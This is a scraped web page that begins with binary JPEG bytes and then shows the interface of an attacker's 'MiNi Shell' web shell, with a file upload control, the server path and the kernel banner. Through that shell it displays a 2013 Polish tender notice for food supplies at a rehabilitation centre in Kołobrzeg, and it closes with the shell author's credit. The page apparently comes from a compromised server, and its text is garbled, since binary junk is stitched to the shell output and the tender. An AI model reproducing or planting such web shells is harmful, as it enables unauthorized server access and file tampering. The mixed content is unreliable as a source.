JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131022/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20131022/221107-N-2013.html

<p class="kh_header"><b>Kołobrzeg: okresowe dostawy artykułów spożywczych</b><br>
<b>Numer ogłoszenia: 221107 - 2013; data zamieszczenia: 22.10.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Centrum Rehabilitacji Rolników Kasy Rolniczego Ubezpieczenia Społecznego NIWA , ul. C. K. Norwida 3, 78-100 Kołobrzeg, woj. zachodniopomorskie, tel. 094 3552010, faks 094 3552011.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.niwa.info.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> okresowe dostawy artykułów spożywczych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> LP	Nazwa produktu	Ilość 	JM
1	Pieprz ziołowy  Opakowanie  ok.15g	10	szt
2	Ocet spirytusowy 10%  Opakowanie ok.0,5l	390	szt
3	Ogórek konserwowy  Fruktus lub produkt równoważny   - skład (Ogórek, ocet spirytusowy )    Opakowanie 0,9-1,0 kg	70	szt
4	Kukurydza konserwowa  Opakowania  1,400kg*-1600*)	50	szt
5	Groszek konserwowy  Opakowania1560*- 1,840kg*)	50	szt
6	Chrzan  skład (Chrzan, kwasek cytrynowy) Opakowanie 0,85-1,0kg	120	szt
7	Fasola konserwowa czerwona  Opakowanie  1400*-1,600kg*)	10	szt
8	Pieczarki marynowane  Opakowanie  0,45*-0,55kg*)	20	szt
9	Koncentrat barszczu czerwonego Zagęszczony sok z buraków ćwikłowych                                     Opakowanie około 0,3l-0,33l	25	szt
10	Szczaw konserwowy Opakowanie 0,9-1,0kg	100	szt
11	Szparagi konserwowe białe  Opakowanie 0,110*-  0,205kg*)	20	szt
12	Pieprz biały  Opakowanie od 700g	3	szt
13	Dżem owocowy - różne smaki   Wysokosłodzony  kl I,  opakowanie od 6,5 -7kg	1500	kg
14	Miód naturalny wielokwiatowy Opakowanie od  0,9kg	50	szt
15	Brzoskwinie konserwowe - połówki owoców skład  Brzoskwinia w syropie                                                         Opakowanie nie mniejsze niż 0,44*-0,5kg*)	50	szt
16	Ananas konserwowy w plastrach   skład  Ananas w syropie  Opakowanie od  0,3* do 0,4* )	50	szt
17	Owoce koktajlowe konserwowe    Ananas, papaja, guana w syropie    Opakowanie 370g-450g	15	szt
18	Dżem owocowy- różne smaki słodzony fruktozą  43g owoców na 100 g produktu  Opakowanie 195g-250g	20	szt
19	Oliwki konserwowe skład Oliwki zielone ,Oliwki czarne  Opakowanie 0,9 - 0,935kg	50	szt
20	Papryka konserwowa czerwona Opakowania 1,6*-  1,8 kg*)	40	szt
21	Ćwikła z chrzanem skład Buraki ćwikłowe, chrzan  Opakowania około 0,27- 0,3kg	250	szt
22	Koncentrat pomidorowy Złoty bażant lub produkt równoważny- gęsty przecier z mięsistych pomidorów, nie zawierający konserwantówe ani substancji dodatkowych. Zawartość pomidorów w produkcie 22-30%  Opakowanie 0,85-1,0kg                                                        	400	szt
23	Keczup Włocławek lub produkt równoważny - skład Koncentrat pomidorowy 30%, cebula, seler, przyprawy  Opakowania około 1kg	600	szt
24	Majonez dekoracyjny Winiary lub produkt równoważny.  Skład  Olej roślinny, żółtko jaja nie mniej niż 6%, musztarda, przyprawy (bez konserwantów) Słoik ok. 0,7kg	300	szt
25	Musztarda  Sarepska lub stołowa lub produkt równowazny o gęstej konsystencji na bazie gorczycy białej, gorczycy czarnej, ocet, przyprawy             Opakowanie ok.  1kg              	500	szt
26	Orzechy włoskie   - łuskane  Opakowanie ok. 0,100kg	10	szt
27	Sos do deserów  wielosmakowe Opakowanie ok.1 kg	30	szt
28	Proszek do pieczenia  Opakowanie 15-35g	100	szt
29	Tabasco   Opakowanie    0,57-0,60ml	10	szt
30	Gruszka w syropie Puszka 2,65-3 kg *	10	szt
31	Kiełki fasoli  mung  Opakowanie  370-400ml	50	szt
32	Płatki migdałowe Całe    Opakowanie ok.50g	10	szt
33	Wiśnia, czereśnia dekoracyjna   Opakowanie 225-250g	10	szt
34	Pędy bambusa Opakowanie 314-330g	150	szt
35	Owoce w syropie       Mandarynka, wiśnia, czereśnia ,truskawka         Opakowanie 370-400g	10	szt
36	Patisony    Opakowanie 400g*-500*g)	20	szt
37	Żurawina  Opakowanie 314-330ml	10	szt
38	Masa makowa Puszka 0,850-0,900 kg	30	szt
39	Mus jabłkowy Opakowanie  0,820- 0,9kg	200	szt
40	Cebulki mini (biała, żółta) Opakowanie 314-330ml	10	szt
41	Susz owocowy skład: jabłka, gruszki, śliwki -   Luz	5	kg
42	Buraczki ćwikłowe w zalewie Opakowanie 1700-1800ml	10	szt
43	Kminek  Opakowanie ok. 20g	5	szt
44	Jałowiec  Opakowanie ok.20g	5	szt
45	Śliwki suszone Opakowanie ok.150g	20	kg
46	Rodzynki    Luz	20	kg
47	Morele suszone Opakowanie ok.150g	20	kg
48	Sos ogrodowy   Knorr   (sos na bazie ziół, substancje wzmacniające smak i zapach)  Opakowanie ok. 700g lub produkt równoważny	75	szt
49	Biały barszcz Knorr lub produkt równoważny (Mąka pszenna, tłuszcz roślinny, substancje wzmacniające smak i zapach ) Opakowania  ok.1kg	20	szt
50	Żelatyna    -  Żelatyna wieprzowa  Opakowanie ok. 1kg	60	kg
51	Przyprawa maślano - ziołowa do warzyw Knorr lub produkt równoważny (Tłuszcz roślinny, masło w proszku, mieszanka przypraw: natka pietruszki,majeranek, cząber,gałka muszkatołowa, pieprz biały, lubczyk ) Opakowanie  ok.1 kg	5	szt
52	Przyprawa warzywna do potraw typu Vegeta lub produkt równoważny ( Sól kuchenna, suszone warzywa nie mniej niż 14%,
Substancje wzmacniające smak, przyprawy ) Opakowanie ok.1kg	450	kg
53	Przyprawa do mięs - Knorr lub produkt równoważny ( Sól,  warzywa suszone, czosnek, cebula, przyprawy, substancje wzmacniajace smak i zapach) Opakowanie ok.700g	10	szt
54	Goździki Opakowanie ok. 20g	25	szt
55	Żurek Knorr lub produkt równoważny ( Mąka żytnia, mleko w proszku lub śmietanka, boczek wędzony, przyprawy, substancje wzmacniające smak i zapach.) Opakowanie  ok.1 kg	40	szt
56	Suszona natka pietruszki  Opakowanie ok.20g	5	szt
57	Słodzik -  Dietetyczny preparat słodzący Opakowanie od 100 do 300 tabletek	5	szt
58	Kakao  Wedel    lub produkt równoważny  Opakowanie  ok.100g	10	szt
59	Kawa inka  lub produkt równoważny Opakowanie od 150g-180g	200	szt
60	Cukier waniliowy Opakowanie ok. 0,50kg	20	kg
61	Kwasek cytrynowy  Opakowanie ok. 1 kg	10	kg
62	Imbir   Opakowanie ok.20 g	40	szt
63	Gałka muszkatołowa mielona Opakowanie ok.15 g	70	szt
64	Aromaty do ciast mix-paluszki	100	szt
65	Cynamon     Opakowanie ok.20 g	50	szt
66	Budyń-   Malinowy, śmietankowy, waniliowy, czekoladowy   Opakowanie ok. 1kg	10	szt
67	Kisiel z cukrem -  Cytrynowy, owocowy Opakowanie ok.1kg	20	szt
68	Galaretka  Owocowa  - różne smaki  Opakowanie ok.1 kg	150	szt
69	Pieprz czarny mielony   Opakowanie  ok.1kg	45	kg
70	Oregano    Opakowanie ok. 10g	25	szt
71	Przyprawa w płynie do zup i potraw Knorr lub produkt równoważny (Ekstrakt z lubczyku, woda, sól ) Opakowanie ok.1 l	800	szt
72	Zioła prowansalskie    Opakowanie  ok.500g	5	szt
73	Liść laurowy   Opakowanie ok. 0,5kg	24	szt
74	Czosnek granulowany  Opakowanie ok.1kg	16	szt
75	Papryka mielona       Opakowanie ok. 1kg	40	kg
76	Majeranek   Luz    Opakowanie ok.1kg	5	kg
77	Bazylia       Opakowanie ok.10g	30	szt
78	Ziele angielskie  Opakowanie ok. 500g	15	szt
79	Przyprawa do piernika  Opakowanie ok. 20g	5	szt
80	Kotlety sojowe  Na bazie odtłuszczonej maki sojowej, niemodyfikowane genetycznie Opakowanie ok.100g	10	szt
81	Pieprz ziarnisty   Opakowanie ok. 20g	10	szt
82	Suchary bez cukru   Opakowanie  285 -300kg	50	szt
83	Pieczywo chrupkie dietetyczne - lekkie Opakowanie ok. 220-250g	10	szt
84	Wafle ryżowe  Opakowanie  100-140g	150	szt.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 23.11.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie żąda wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>warunek zostanie uznany za spełniony wówczas, gdy wykonawca wykaże, że dysponuje, bądź będzie dysponował nie mniej niż jednym środkiem transportu, którym będzie dostarczał przedmiot zamówienia, odpowiadający wymaganiom sanitarnym, określonym ustawą z dnia 25 sierpnia 2006 r. o bezpieczeństwie żywności i żywienia (Dz.U.2010.136.914 ze zmianami) w związku z rozporządzeniem nr 852/2004 Parlamentu Europejskiego i Rady Unii Europejskiej z dn. 29 kwietnia 2004 r. (ogólne wymogi higieny dla wszystkich przedsiębiorstw sektora spożywczego - załącznik nr 2 do rozporządzenia)</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">1)	zaświadczenie właściwego organu Państwowej Inspekcji Sanitarnej o sprawowaniu nadzoru 
nad stosowaniem zasad wdrożonego systemu HACCP (podstawa prawna art. 59 i 73 ustawy z dnia 
25 sierpnia 2006 roku o bezpieczeństwie żywności i żywienia Dz.U.2010.136.914 j.t.)
lub
2)	protokół z urzędowej kontroli żywności, przeprowadzonej przez organy Państwowej Inspekcji Sanitarnej zgodnie z art. 4 Rozporządzenia Parlamentu Europejskiego i Rady Unii Europejskiej 
nr 882/2004 z dnia 29.04.2004r. Dz. U. UE L.04.139.l, w skład którego wchodzi punkt określający prawidłowości stosowania zasad systemu HACCP (podstawa prawna: art. 9 i 10 rozporządzenia 
jak wyżej oraz art. 59 i 73 ust. 1 i 6 ustawy z dnia 25 sierpnia 2006 roku o bezpieczeństwie żywności 
i żywienia Dz.U.2010.136.914 j.t.)
lub
3)	certyfikat HACCP - nie dotyczy producentów na etapie produkcji pierwotnej.
Prawo Unii Europejskiej nie zobowiązuje przedsiębiorców do certyfikacji wdrożonego systemu HACCP. System certyfikacji przez niezależne instytucje certyfikujące jest w pełni dobrowolny. Zatem alternatywne sformułowanie wymagań Zamawiającego co do dokumentów potwierdzających wdrożenie i stosowanie HACCP jest w pełni uzasadnione</p></li>



</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość istotnych zmian postanowień umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy w następujących przypadkach:
a)	wystąpienia zmiany przepisów prawa w zakresie realizacji przedmiotu zamówienia i konieczności dostosowania do nich zapisów umowy,
b)	w przypadku zmiany stawek podatku od towarów i usług (VAT), skutkujących koniecznością zmiany  wynagrodzenia,
c)	wystąpienia   okoliczności,  których   nie   można   było  przewidzieć  na   etapie   sporządzania   SIWZ i podpisywania umowy, a które są niezbędne dla prawidłowej realizacji zamówienia.            
Wszelkie zmiany niniejszej umowy wymagają dla swej ważności formy pisemnej pod rygorem nieważności i będą dopuszczalne w granicach unormowania art. 144 ustawy Prawo zamówień publicznych.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.niwa.info.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Centrum Rehabilitacji Rolników Kasy Rolniczego Ubezpieczenia Społecznego NIWA w Kołobrzegu - 78-100 Kołobrzeg ul. C.K. Norwida 3
Dział Organizacyjny.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.10.2013 godzina 10:00, miejsce: Centrum Rehabilitacji Rolników Kasy Rolniczego Ubezpieczenia Społecznego NIWA w Kołobrzegu - 78-100 Kołobrzeg ul. C.K. Norwida 3
Sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com